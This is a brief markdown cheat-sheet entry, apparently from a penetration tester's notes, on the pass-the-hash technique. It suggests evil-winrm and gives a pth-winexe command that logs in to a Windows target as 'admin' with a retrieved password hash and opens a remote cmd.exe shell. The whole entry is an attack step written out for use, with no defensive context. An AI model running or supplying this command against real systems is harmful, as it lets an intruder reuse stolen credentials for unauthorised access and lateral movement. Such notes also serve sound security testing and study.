# Pass the Hash * Authenticate with retrieved hash * User evil-winrm or ``` pth-winexe -U 'admin%hash' //<target-IP> cmd.exe ```